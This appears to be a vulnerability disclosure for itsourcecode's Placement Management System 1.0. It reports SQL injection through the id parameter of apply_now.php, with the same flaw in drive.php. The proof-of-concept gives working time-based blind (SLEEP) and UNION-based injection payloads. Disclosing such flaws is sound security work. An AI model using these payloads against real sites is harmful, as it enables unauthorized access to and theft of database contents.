Skip to content

Latest commit

 

History

History
31 lines (20 loc) · 1.02 KB

CVE11-3.md

File metadata and controls

31 lines (20 loc) · 1.02 KB
Raw

Vendor

itsourcecode

Product

Placement Management System

version

1.0

Download Source Code: https://itsourcecode.com/wp-content/uploads/2021/04/Placement-Management-System-Project-In-PHP-Source-Code.zip

Description

In the apply_now.php page, the id parameter is not strictly filtered, allowing attackers to construct malicious payloads for SQL injection attacks.The same issue also exists on the drive.php page. image

Poc

Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1150 FROM (SELECT(SLEEP(5)))cjwo) AND 'BTUh'='BTUh

    Type: UNION query
    Title: Generic UNION query (NULL) - 14 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x716a7a7171,0x7473767843427a464d48514b6e4b464a5365624d71574d7944575573446d62614950505a487a437a,0x7162626b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -